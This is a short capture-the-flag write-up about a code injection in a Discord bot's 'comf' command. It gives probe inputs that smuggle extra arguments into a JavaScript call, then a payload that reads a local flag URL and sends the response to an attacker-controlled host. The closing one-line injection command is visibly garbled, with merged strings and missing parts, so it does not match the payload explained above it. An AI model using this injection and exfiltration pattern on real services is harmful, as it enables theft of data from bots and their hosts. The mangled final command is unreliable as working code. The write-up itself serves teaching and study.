Writeup — HTsP X-MAS CTF 2020 — Comfort bot

This challenge is part of X-MAS CTF 2020. In this challenge we need to get a Discord bot to reveal the flag. The source code is provided as part of the challenge and analysing it quickly reveals a code injection exploit:

We can test the vulnerability by sending the bots commands like:

comf foo ','
comf foo ',1,'
comf foo ',1,2,'

Which translate to function calls like cleverbot.SendAI('foo',1,2,'')This takes advantage of the fact that Javascript is a loosely typed language and we can supply any number of arguments to the function. After we verify that the bot answers to these commands we can add JS code to get the flag and make an HTTP request to our own server:

window.foo=new XMLHttpRequest();
window.foo.onreadystatechange = function() {window.open("http://MYIPADDRESS/"+this.responseText)}
window.turl = "http://localhost/flag";
window.foo.open("GET",window.turl,true);
window.foo.send();

With this code and the fact that function arguments are evaluated left to right the final command to send to the bot is:

comf foo',window.foo=new XMLHttpRequest(),window.foo.onreadystatechange = function() {window.open("http://MYIPADDRESS"http://localhost/flag",window.foo.open("GET",window.turl,true),window.foo.send(),'